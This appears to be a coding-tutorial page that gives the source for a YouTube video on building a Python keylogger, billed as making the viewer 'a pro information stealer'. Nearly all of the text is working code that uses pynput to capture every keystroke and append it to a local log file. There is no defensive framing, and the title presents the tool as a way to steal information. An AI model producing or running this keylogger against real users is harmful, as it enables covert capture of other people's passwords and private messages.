Make Simple Keylogger Using Python | Become a Pro Information Stealer | Python | Coding With Roannie
Make Simple Keylogger Using Python | Become a Pro Information Stealer | Python | Coding With Roannie
SOURCE CODE FOR YOUTUBE VIDEO
from pynput.keyboard import Listener
def log_keystroke(key):
key = str(key).replace("'", "")
if key == 'Key.space':
key = ' '
if key == 'Key.shift_r':
key = ''
if key == "Key.enter":
key = '\n'
with open("log.txt", 'a') as f:
f.write(key)
with Listener(on_press=log_keystroke) as l:
l.join()